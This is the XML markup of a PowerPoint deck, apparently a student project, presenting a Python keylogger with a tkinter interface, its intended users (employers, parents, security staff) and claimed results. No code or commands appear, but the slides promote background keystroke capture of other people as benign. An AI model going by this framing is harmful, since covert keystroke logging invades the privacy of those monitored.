          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71253DA9-6518-070D-491B-218057330EB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726"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149009" y="1404731"/>
            <a:ext cx="5711687" cy="42340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41D0-364C-703C-0843-5D18A16C6175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755332" y="385444"/>
            <a:ext cx="10681335" cy="553998"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>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101D2FC-EBB6-6B2C-5867-BAA90B18CED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1577340"/>
            <a:ext cx="9677400" cy="2492990"/>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Our Key Logger project successfully addressed the need for an efficient and user-friendly keystroke logging solution. We developed a lightweight, reliable application using Python and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providing real-time keystroke logging with minimal system impact. Our solution ensures data security and ease of use with multiple logging formats. The project achieved low latency, high accuracy, and maintained low resource utilization. Positive feedback from security professionals, employers, and parents highlighted its efficiency, user-friendliness, and cost-effectiveness. Moving forward, we plan to introduce more customization options, support additional languages, and implement advanced security features. The positive results and user satisfaction validate the effectiveness and value of our Key Logger, and we are committed to continuous improvement to meet future user needs. Thank you for your attention and interest.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09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6B43FA-FC4E-BECD-1AAF-14599B0BC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403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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D33640-7F10-4BE7-A5BF-1E3C60009244}"/>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object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{127D8DF8-EE3D-499C-BA7D-3C08DEE307AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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4" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7C51A7E-E646-4BE9-8210-4294BD8790B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10687050" y="6134100"/>
            <a:ext cx="247650" cy="247650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0FFB976-D582-43AF-91CE-086D401ED0ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653415" y="804647"/>
            <a:ext cx="10681335" cy="567463"/>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lang="en-US" sz="3200" b="0" i="0" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" spc="25" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" spc="15" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E569403-61BD-4032-9F2E-05D42A2FF085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2081783" y="1524506"/>
            <a:ext cx="5699571" cy="4862870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="850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120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</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Introduction to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Problem Statement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Problem Overview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Who are the End users?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Solution and Its Value Proposition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The WOW in the solution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Modeling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Results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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2F791E2-F5E5-43AE-AE17-65CB47B4A1AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="47625" y="3838573"/>
            <a:ext cx="4124325" cy="3009900"/>
            <a:chOff x="47625" y="3819523"/>
            <a:chExt cx="4124325" cy="3009900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E518F6B9-0FEB-4B8F-A1F0-3CEF168D14AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="466725" y="6410325"/>
              <a:ext cx="3705225" cy="295275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D89AB08-F6A2-464F-9892-F30801357C3E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"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364691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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74CBEDBF-D384-4AE8-9AB6-6BD3A1CD95C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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F8BD7CF-262C-4EB3-B167-5C8BD2235306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9591675" y="5915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6" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{320C141B-23E4-4015-91A8-E6EC6BF523C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17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDA62835-DC4E-4F25-BD2B-E6ACDC0609B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755332" y="385444"/>
            <a:ext cx="10681335" cy="1124667"/>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lang="en-US" sz="3200" b="0" i="0" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>INTRODUCTION TO KEYLOGGER</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" b="1" spc="5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="5"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 A Python-based Key Logging Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="5"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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C566AD93-08C9-4300-8736-101CF1B7E5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71475" y="2246718"/>
            <a:ext cx="4137627" cy="2470559"/>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p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FCBC661-993A-4AE1-8C37-1D7E59172262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="482898" y="1940875"/>
            <a:ext cx="68383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Our Key Logger project aims to address the need for a reliable, efficient, and user-friendly keystroke logging solution. In today's digital world, key loggers are essential tools for monitoring and ensuring security. Existing solutions often fall short in terms of usability, performance, and data security. Our project leverages Python and `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>` to create a lightweight application that logs keystrokes in real-time with minimal system impact. This presentation will walk you through our journey, from identifying the problem and designing the solution to showcasing our results and future plans. We believe our Key Logger offers a robust and valuable tool for various users, including security professionals, employers, and parents, by combining simplicity, efficiency, and cost-effectiveness.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31510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464707"/>
            <a:ext cx="2590800" cy="3200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455717"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600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PROBLEM STATEMENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDCD77A2-C69B-A2AD-E557-689FF1DCFA4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="563880" y="1105167"/>
            <a:ext cx="99060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need for an efficient key logging solution is prevalent in various fields.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need for monitoring keyboard activities for security and user behavior analysis.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Issues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Organizations require tools to monitor unauthorized access and potential security breaches.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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Productivity Analysis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 need to analyze employee productivity and detect any misuse of company resources.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Parental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 want to ensure their children’s online activities are safe and appropriate.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Challenges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existing solutions are complex and difficult to use.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User-Friendliness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intuitive interfaces makes it hard for non-technical users to operate.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Concerns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data is logged securely without violating privacy laws.</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5888" y="264340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2197" y="472049"/>
            <a:ext cx="1068133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600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PROBLEM OVERVIEW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BA67B09-71B3-C037-A7F0-DEB16D41A623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="676274" y="1296013"/>
            <a:ext cx="10372725"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 aims to address the issues identified in the problem statement by developing a user-friendly and efficient key logger.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Key Logging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keystrokes as they happen and saves them in real-time.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JSON and Text Log Generation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logs in both JSON and text formats for easy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GUI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an intuitive interface for users.</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 Overview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Used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json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key presses and releases.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logs to files for later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and designed to run seamlessly in the background.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8717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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WHO ARE THE END USERS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6E5E07F-9758-BE5B-215E-6E46380F43A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1599620"/>
            <a:ext cx="104394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the target audience for our key logging application helps in understanding its utility and designing its features accordingly.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Users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Professionals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and detect unauthorized access attempts.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employee productivity and ensure resources are used appropriately.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their children’s online activities to ensure they are safe.</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Secondary Users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studies on user behavior and typing patterns.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F1E375-4B4F-38A5-EEF9-2E32B3EA4AC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="381000"/>
            <a:ext cx="10591800" cy="3847207"/>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Administrators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compliance with organizational policies and investigate incidents.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Use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who want to keep track of their own keyboard activity for various reasons.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Immediate alerts on suspicious activities.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Productivity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Detailed reports on keyboard usage.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Parental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of all keyboard activity for review</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20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8646" y="402414"/>
            <a:ext cx="11414707" cy="690574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SOLUTION AND ITS VALUE PROPOSITION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F9D25C-F8B5-1556-AC94-268FF411EA56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2999096" y="1327420"/>
            <a:ext cx="853274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key logger offers a robust solution to the problems identified.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Simplicity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set up and use, even for non-technical users.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Logging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keystrokes in real-time, providing immediate insights.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Logs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both JSON and text formats for detailed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Intuitive GUI built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ease of use.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and does not significantly impact system performance.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4B6DE6-C52D-31E6-A72B-C6F905E5B58F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="762000"/>
            <a:ext cx="10591800" cy="3600986"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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customized to meet specific user needs.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Open-source solution, reducing the need for expensive software.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Suitable for individual use as well as large organizations.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performance with regular updates and support.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450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280</TotalTime>
  <Words>1498</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>226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Century Gothic</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Savon</vt:lpstr>
      <vt:lpstr>Hari Sai Kumar Thatholu</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PROBLEM STATEMENT</vt:lpstr>
      <vt:lpstr>PROBLEM OVERVIEW</vt:lpstr>
      <vt:lpstr>WHO ARE THE END USERS?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SOLUTION AND ITS VALUE PROPOSITION</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>THE WOW IN THE SOLUTION</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>MODELING</vt:lpstr>
      <vt:lpstr>CODE SNIPPET</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation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N V S SAI SIRI</dc:title>
  <dc:creator>pc</dc:creator>
  <cp:lastModifiedBy>Hari Sai</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-03T05:48:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-09T11:43:19Z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